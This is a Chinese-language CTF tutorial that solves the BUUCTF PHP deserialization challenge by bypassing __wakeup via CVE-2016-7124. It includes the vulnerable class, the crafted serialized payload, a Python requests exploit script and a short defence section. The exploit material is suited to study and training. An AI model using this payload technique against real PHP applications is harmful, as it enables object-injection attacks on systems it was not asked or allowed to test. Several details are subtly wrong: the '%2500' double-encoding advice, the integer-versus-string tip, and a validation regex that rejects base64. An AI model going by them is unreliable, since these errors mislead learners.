手把手教你复现BUUCTF那道经典的PHP反序列化题（绕过__wakeup拿flag）

从零攻破BUUCTF PHP反序列化漏洞：绕过__wakeup的实战艺术

当你在CTF赛场上第一次遇到PHP反序列化题目时，那种既熟悉又陌生的感觉往往让人手足无措。今天，我们就以BUUCTF平台上的经典题目"[极客大挑战 2019]PHP1"为例，带你体验一次完整的漏洞利用之旅。这不仅仅是一次解题过程，更是一次思维模式的训练——如何从黑盒测试到白盒分析，最终构造出完美的攻击payload。

1. 环境搭建与初步侦查

任何CTF挑战的第一步都是搭建实验环境。访问题目提供的Web界面，页面看似简单，但经验告诉我们，魔鬼往往藏在细节里。按下Ctrl+U查看源码是基本操作，不过这次似乎没有明显线索。

常见Web备份文件命名规律：

• www.zip
• backup.tar.gz
• source.rar
• website.bak

尝试访问/www.zip，果然下载到一个压缩包。解压后发现三个关键文件：

/www ├── flag.php # 假flag诱饵 ├── index.php # 主入口文件 └── class.php # 核心业务逻辑

用代码编辑器打开index.php，关键代码片段如下：

<?php include 'class.php'; $select = $_GET['select']; $res = unserialize($select); ?>

这段代码暴露出明显的反序列化入口点——通过GET参数select接收序列化数据。这正是我们要重点攻击的突破口。

2. 核心漏洞代码分析

class.php中定义了名为Name的类，包含两个关键魔术方法：

class Name { private $username = 'nonono'; private $password = 'yesyes'; function __wakeup() { $this->username = 'guest'; // 反序列化时自动执行 } function __destruct() { if ($this->password != 100) { die("密码验证失败！"); } if ($this->username === 'admin') { global $flag; echo $flag; // 目标输出点 } } }

漏洞利用条件分析：

1. 需要控制$username为'admin'
2. 需要设置$password为100
3. 必须绕过__wakeup()的自动重置

3. 魔术方法的执行时机深度解析

理解PHP对象生命周期是成功的关键。以下是三个关键魔术方法的触发场景：

特别需要注意的是__wakeup的绕过条件：

• PHP版本需满足：PHP5 < 5.6.25 或 PHP7 < 7.0.10
• 修改序列化字符串中对象属性数量，使其大于实际数量

4. 构造攻击Payload的完整过程

4.1 基础序列化尝试

首先创建测试脚本exploit.php：

<?php class Name { private $username = 'admin'; private $password = '100'; } echo serialize(new Name()); ?>

输出结果：

O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}

4.2 处理私有变量编码问题

Private变量在序列化时会包含类名前后的空字符（%00），需要特殊处理：

原始格式：

s:14:"Nameusername" → 实际应为 s:14:"%00Name%00username"

修正后的序列化字符串：

O:4:"Name":2:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}

4.3 绕过__wakeup的终极Payload

应用CVE-2016-7124漏洞，将属性数量改为大于实际值（如3）：

最终Payload：

O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}

URL编码后（注意%00需要双重编码）：

?select=O:4:"Name":3:{s:14:"%2500Name%2500username";s:5:"admin";s:14:"%2500Name%2500password";s:3:"100";}

5. 实战中的常见问题排查

即使按照步骤操作，仍可能遇到各种意外情况。以下是几个典型问题及解决方案：

问题1：Payload执行后仍显示guest

• 检查PHP版本是否符合漏洞条件
• 确认属性数量修改正确（原为2，改为3或更大）

问题2：报错"unserialize(): Error at offset"

• 检查私有变量名的长度计算是否正确
• 确保%00被正确处理（在Burp Suite中可直接输入空字节）

问题3：返回空白页面

• 检查__destruct中的条件判断
• 确认password值确实为100（整数而非字符串）

在真实CTF比赛中，我建议使用Python的requests库进行自动化测试：

import requests payload = "O:4:\"Name\":3:{s:14:\"\x00Name\x00username\";s:5:\"admin\";s:14:\"\x00Name\x00password\";s:3:\"100\";}" response = requests.get("http://target.com/index.php?select=" + payload) print(response.text)

6. 防御方案与安全启示

虽然我们已经成功利用了这个漏洞，但作为负责任的安全研究者，更应该思考如何防御：

安全开发建议：

1. 避免直接反序列化用户输入
2. 使用json_encode/json_decode替代序列化
3. 及时更新PHP版本（修复CVE-2016-7124）
4. 对魔术方法中的安全逻辑进行二次验证

输入验证示例：

if (preg_match('/^[a-zA-Z0-9]+$/', $_GET['select'])) { $data = json_decode(base64_decode($_GET['select']), true); // 处理数据... } else { die('非法输入！'); }

通过这道题目，我们不仅学习了一个具体的漏洞利用技术，更重要的是建立了分析PHP反序列化问题的系统思维。下次当你看到unserialize()函数时，脑海中应该立即浮现出魔术方法的执行流程、属性修饰符的影响以及版本相关的漏洞特性——这才是CTF训练带给我们的真正价值。